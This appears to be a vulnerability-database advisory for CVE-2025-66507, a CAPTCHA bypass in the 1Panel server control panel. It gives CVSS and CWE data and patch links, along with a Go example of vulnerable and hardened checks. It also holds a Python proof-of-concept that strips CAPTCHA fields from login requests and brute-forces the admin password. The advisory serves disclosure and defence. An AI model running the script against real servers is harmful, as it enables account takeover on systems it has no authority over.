Security Vulnerability Report
CVE-2025-66507 CVSS 7.5 HIGH

CVE-2025-66507

Published: 2025-12-09 16:18:19
Last Modified: 2025-12-10 21:28:34

Description

1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.13 and below allow an unauthenticated attacker to disable CAPTCHA verification by abusing a client-controlled parameter. Because the server previously trusted this value without proper validation, CAPTCHA protections can be bypassed, enabling automated login attempts and significantly increasing the risk of account takeover (ATO). This issue is fixed in version 2.0.14.
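The weakness class described above (CWE-602 / CWE-807: a server-side security decision driven by a client-supplied value) is easiest to see as a vulnerable check beside its hardened form. The Go below is an added example written for this page, not 1Panel's code; the `skipCaptcha` field, the `captchaId`/`captchaCode` names and the `captchaValid` lookup are hypothetical stand-ins for whatever the real parameter and challenge store are.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// LoginRequest is the decoded JSON login body. SkipCaptcha is a hypothetical
// stand-in for the advisory's client-controlled parameter, not 1Panel's real field.
type LoginRequest struct {
	Username    string `json:"username"`
	Password    string `json:"password"`
	CaptchaID   string `json:"captchaId"`
	CaptchaCode string `json:"captchaCode"`
	SkipCaptcha bool   `json:"skipCaptcha"`
}

var ErrCaptchaRequired = errors.New("captcha verification required")

// captchaValid stands in for a server-side lookup of the issued challenge
// (constructed: a single known-good id/code pair).
func captchaValid(id, code string) bool { return id == "demo-id" && code == "demo-code" }

// vulnerableCheck lets the request body decide whether CAPTCHA is enforced
// (CWE-602 / CWE-807): any unauthenticated client can send skipCaptcha=true.
func vulnerableCheck(req LoginRequest) error {
	if req.SkipCaptcha || captchaValid(req.CaptchaID, req.CaptchaCode) {
		return nil
	}
	return ErrCaptchaRequired
}

// hardenedCheck never consults the client flag: whether CAPTCHA is required is
// a server-side setting, and the body only supplies the answer to verify.
func hardenedCheck(req LoginRequest, serverRequiresCaptcha bool) error {
	if serverRequiresCaptcha && !captchaValid(req.CaptchaID, req.CaptchaCode) {
		return ErrCaptchaRequired
	}
	return nil
}

func main() {
	// Constructed body: no CAPTCHA answer, but asks the server to skip verification.
	var req LoginRequest
	_ = json.Unmarshal([]byte(`{"username":"admin","password":"guess","skipCaptcha":true}`), &req)
	fmt.Println("vulnerable:", vulnerableCheck(req))     // <nil> (bypassed)
	fmt.Println("hardened:  ", hardenedCheck(req, true)) // captcha verification required
}
```

On the detection side, a login body that carries a bypass-style flag, or that omits the CAPTCHA answer while the server setting requires one, is worth logging as an anomaly rather than silently accepting or rejecting.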

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:* - VULNERABLE
1Panel <= 2.0.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66507 PoC - 1Panel CAPTCHA Bypass
# Target: 1Panel <= 2.0.13
# Attack: Bypass CAPTCHA verification to enable automated login attempts

import requests
import json

TARGET_URL = "http://target-ip:8080"
LOGIN_ENDPOINT = f"{TARGET_URL}/api/v1/login"


def exploit():
    """
    Bypass CAPTCHA by manipulating client-controlled parameters.
    The server trusts client parameters without proper validation.
    """
    # Step 1: Prepare login payload with CAPTCHA bypass
    # Remove or manipulate CAPTCHA-related parameters
    login_payload = {
        "username": "admin",
        "password": "password_attempt",
        # Remove captcha parameters to bypass verification
        # "captcha_id": "",    # Commented out - not sent
        # "captcha_code": "",  # Commented out - not sent
    }

    # Step 2: Send login request without CAPTCHA
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        response = requests.post(
            LOGIN_ENDPOINT,
            json=login_payload,
            headers=headers,
            timeout=10
        )
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")

        # Check if CAPTCHA was bypassed
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 200:
                print("[+] CAPTCHA BYPASS SUCCESSFUL!")
                print("[+] Automated login attempts are now possible")
                return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

    return False


def brute_force_attack():
    """
    Perform brute force attack after CAPTCHA bypass.
    """
    passwords = ["admin", "password", "123456", "1panel", "linux"]

    for pwd in passwords:
        payload = {
            "username": "admin",
            "password": pwd
            # No CAPTCHA parameters - bypassed
        }
        response = requests.post(LOGIN_ENDPOINT, json=payload)
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 200 and data.get("data"):
                print(f"[!] Valid credentials found: admin/{pwd}")
                return True

    return False


if __name__ == "__main__":
    print("[*] CVE-2025-66507 Exploitation")
    print("[*] Target: 1Panel <= 2.0.13")
    if exploit():
        print("[*] Initiating brute force attack...")
        brute_force_attack()
    print("[*] Mitigation: Upgrade to 1Panel v2.0.14")
```

NVD Record Details

Status: Analyzed
Exploitability Score: 3.9
Impact Score: 3.6
Affected range: 1Panel versions before 2.0.14 (versionEndExcluding 2.0.14)

Weaknesses (CWE)

CWE-290 (Authentication Bypass by Spoofing)
CWE-602 (Client-Side Enforcement of Server-Side Security)
CWE-807 (Reliance on Untrusted Inputs in a Security Decision)

References

https://github.com/1Panel-dev/1Panel/commit/ac43f00273be745f8d04b90b6e2b9c1a40ef7bca (Patch)
https://github.com/1Panel-dev/1Panel/releases/tag/v2.0.14 (Release Notes)
https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-qmg5-v42x-qqhq (Vendor Advisory)